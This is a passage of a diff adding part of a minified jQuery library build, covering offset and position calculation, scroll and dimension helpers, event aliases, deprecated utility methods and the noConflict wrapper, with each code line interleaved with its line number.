+ ("absolute" === l || "fixed" === l) && (o + u).indexOf("auto") > -1 ? ((a = (r = c.position()).top), (i = r.left)) : ((a = parseFloat(o) || 0), (i = parseFloat(u) || 0)),
3940
+ h(t) && (t = t.call(e, n, b.extend({}, s))),
3941
+ null != t.top && (f.top = t.top - s.top + a),
3942
+ null != t.left && (f.left = t.left - s.left + i),
3943
+ "using" in t ? t.using.call(e, f) : c.css(f);
3944
+ },
3945
+ }),
3946
+ b.fn.extend({
3947
+ offset: function (e) {
3948
+ if (arguments.length)
3949
+ return void 0 === e
3950
+ ? this
3951
+ : this.each(function (t) {
3952
+ b.offset.setOffset(this, e, t);
3953
+ });
3954
+ var t,
3955
+ n,
3956
+ r = this[0];
3957
+ return r ? (r.getClientRects().length ? ((t = r.getBoundingClientRect()), (n = r.ownerDocument.defaultView), { top: t.top + n.pageYOffset, left: t.left + n.pageXOffset }) : { top: 0, left: 0 }) : void 0;
3958
+ },
3959
+ position: function () {
3960
+ if (this[0]) {
3961
+ var e,
3962
+ t,
3963
+ n,
3964
+ r = this[0],
3965
+ i = { top: 0, left: 0 };
3966
+ if ("fixed" === b.css(r, "position")) t = r.getBoundingClientRect();
3967
+ else {
3968
+ for (t = this.offset(), n = r.ownerDocument, e = r.offsetParent || n.documentElement; e && (e === n.body || e === n.documentElement) && "static" === b.css(e, "position"); ) e = e.parentNode;
3969
+ e && e !== r && 1 === e.nodeType && (((i = b(e).offset()).top += b.css(e, "borderTopWidth", !0)), (i.left += b.css(e, "borderLeftWidth", !0)));
3970
+ }
3971
+ return { top: t.top - i.top - b.css(r, "marginTop", !0), left: t.left - i.left - b.css(r, "marginLeft", !0) };
3972
+ }
3973
+ },
3974
+ offsetParent: function () {
3975
+ return this.map(function () {
3976
+ for (var e = this.offsetParent; e && "static" === b.css(e, "position"); ) e = e.offsetParent;
3977
+ return e || er;
3978
+ });
3979
+ },
3980
+ }),
3981
+ b.each({ scrollLeft: "pageXOffset", scrollTop: "pageYOffset" }, function (e, t) {
3982
+ var n = "pageYOffset" === t;
3983
+ b.fn[e] = function (r) {
3984
+ return R(
3985
+ this,
3986
+ function (e, r, i) {
3987
+ var o;
3988
+ if ((g(e) ? (o = e) : 9 === e.nodeType && (o = e.defaultView), void 0 === i)) return o ? o[t] : e[r];
3989
+ o ? o.scrollTo(n ? o.pageXOffset : i, n ? i : o.pageYOffset) : (e[r] = i);
3990
+ },
3991
+ e,
3992
+ r,
3993
+ arguments.length
3994
+ );
3995
+ };
3996
+ }),
3997
+ b.each(["top", "left"], function (e, t) {
3998
+ b.cssHooks[t] = eW(d.pixelPosition, function (e, n) {
3999
+ if (n) return (n = eM(e, t)), eP.test(n) ? b(e).position()[t] + "px" : n;
4000
+ });
4001
+ }),
4002
+ b.each({ Height: "height", Width: "width" }, function (e, t) {
4003
+ b.each({ padding: "inner" + e, content: t, "": "outer" + e }, function (n, r) {
4004
+ b.fn[r] = function (i, o) {
4005
+ var a = arguments.length && (n || "boolean" != typeof i),
4006
+ s = n || (!0 === i || !0 === o ? "margin" : "border");
4007
+ return R(
4008
+ this,
4009
+ function (t, n, i) {
4010
+ var o;
4011
+ return g(t)
4012
+ ? 0 === r.indexOf("outer")
4013
+ ? t["inner" + e]
4014
+ : t.document.documentElement["client" + e]
4015
+ : 9 === t.nodeType
4016
+ ? ((o = t.documentElement), Math.max(t.body["scroll" + e], o["scroll" + e], t.body["offset" + e], o["offset" + e], o["client" + e]))
4017
+ : void 0 === i
4018
+ ? b.css(t, n, s)
4019
+ : b.style(t, n, i, s);
4020
+ },
4021
+ t,
4022
+ a ? i : void 0,
4023
+ a
4024
+ );
4025
+ };
4026
+ });
4027
+ }),
4028
+ b.each(["ajaxStart", "ajaxStop", "ajaxComplete", "ajaxError", "ajaxSuccess", "ajaxSend"], function (e, t) {
4029
+ b.fn[t] = function (e) {
4030
+ return this.on(t, e);
4031
+ };
4032
+ }),
4033
+ b.fn.extend({
4034
+ bind: function (e, t, n) {
4035
+ return this.on(e, null, t, n);
4036
+ },
4037
+ unbind: function (e, t) {
4038
+ return this.off(e, null, t);
4039
+ },
4040
+ delegate: function (e, t, n, r) {
4041
+ return this.on(t, e, n, r);
4042
+ },
4043
+ undelegate: function (e, t, n) {
4044
+ return 1 === arguments.length ? this.off(e, "**") : this.off(t, e || "**", n);
4045
+ },
4046
+ hover: function (e, t) {
4047
+ return this.mouseenter(e).mouseleave(t || e);
4048
+ },
4049
+ }),
4050
+ b.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "), function (e, t) {
4051
+ b.fn[t] = function (e, n) {
4052
+ return arguments.length > 0 ? this.on(t, null, e, n) : this.trigger(t);
4053
+ };
4054
+ });
4055
+ var tP = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g;
4056
+ (b.proxy = function (e, t) {
4057
+ var n, r, o;
4058
+ if (("string" == typeof t && ((n = e[t]), (t = e), (e = n)), h(e)))
4059
+ return (
4060
+ (r = i.call(arguments, 2)),
4061
+ ((o = function () {
4062
+ return e.apply(t || this, r.concat(i.call(arguments)));
4063
+ }).guid = e.guid = e.guid || b.guid++),
4064
+ o
4065
+ );
4066
+ }),
4067
+ (b.holdReady = function (e) {
4068
+ e ? b.readyWait++ : b.ready(!0);
4069
+ }),
4070
+ (b.isArray = Array.isArray),
4071
+ (b.parseJSON = JSON.parse),
4072
+ (b.nodeName = S),
4073
+ (b.isFunction = h),
4074
+ (b.isWindow = g),
4075
+ (b.camelCase = U),
4076
+ (b.type = x),
4077
+ (b.now = Date.now),
4078
+ (b.isNumeric = function (e) {
4079
+ var t = b.type(e);
4080
+ return ("number" === t || "string" === t) && !isNaN(e - parseFloat(e));
4081
+ }),
4082
+ (b.trim = function (e) {
4083
+ return null == e ? "" : (e + "").replace(tP, "");
4084
+ }),
4085
+ "function" == typeof define &&
4086
+ define.amd &&
4087
+ define("jquery", [], function () {
4088
+ return b;
4089
+ });
4090
+ var tO = e.jQuery,
4091
+ t0 = e.$;
4092
+ return (
4093
+ (b.noConflict = function (t) {
4094
+ return e.$ === b && (e.$ = t0), t && e.jQuery === b && (e.jQuery = tO), b;
4095
+ }),
4096
+ void 0 === t && (e.jQuery = e.$ = b),
4097
+ b
4098
+ );
4099
+ });